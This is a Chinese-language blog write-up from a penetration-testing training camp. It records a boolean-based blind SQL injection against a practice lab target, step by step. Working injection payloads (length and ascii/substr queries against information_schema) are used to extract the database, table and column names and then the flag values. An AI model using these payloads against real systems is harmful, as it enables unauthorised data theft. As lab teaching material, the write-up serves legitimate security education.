其他分享
首页 > 其他分享> > 封神台——训练营0基础学渗透测试

封神台——训练营0基础学渗透测试

作者:互联网

盲注-没有回显情况下SQL

SQL盲注——靶场A

1.判断数据库长度:and length(database())>4 12
2 .数据库名称:and substr(database(),1,1)='k ’ ascii(substr(database() ),1,1))>107
用burp进行爆破:开服务器,用本机的私网,注意变量的添加 107 97 110 119 111 108 111 110 103 120 105 97 kanwolongxia
3.判断有几个表名和表名长度:

and length(( select table_name from information_schema.tables where table_schema='kanwolongxia' limit 0, 1)) >1 长度为6
and length((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 1,1))>1 长度为4
and length((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 2,1))>1 长度为3

4.判断表名:

and ascii(substr((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 2,1),1,1)) = 1

108 111 102 108 97 103 --loflag
110 101 119 115 --news
117 115 101 114 --user
5.判断字段长度:

and length((select column_name from information_schema.columns where table_name='loflag' limit 0,1))=2
and length((select column_name from information_schema.columns where table_name='loflag' limit 1,1))=6

6.查询字段名:

and ascii(substr((select column_name from information_schema.columns where table_name='loflag' limit 0,1),1,1))>1 字段为id
and ascii(substr((select column_name from information_schema.columns where table_name='loflag' limit 1,1),1,1))>1 字段为flaglo

7.查具体数据长度:

and length((select flaglo from loflag limit 0,1))=8
and length((select flaglo from loflag limit 1,1))=7
and length((select flaglo from loflag limit 2,1))=10
and length((select flaglo from loflag limit 3,1))=12
and length((select flaglo from loflag limit 4,1))=14

8.查具体数据:

 and ascii(substr((select flaglo from loflag limit 0,1),1,1))>1 --zKaQ-QQQ
 and ascii(substr((select flaglo from loflag limit 1,1),1,1))>1 --zKaQ-RD
 and ascii(substr((select flaglo from loflag limit 2,1),1,1))>1 --zKaQ-Moren
 and ascii(substr((select flaglo from loflag limit 3,1),1,1))>1 --zKaQ-time-hj
 and ascii(substr((select flaglo from loflag limit 4,1),1,1))>1 --zKaQ-time-zxxz

SQL盲注——靶场A

三级目录

标签:name,神台,训练营,渗透,limit,table,schema,select,loflag
来源: https://blog.csdn.net/weixin_51830687/article/details/119462547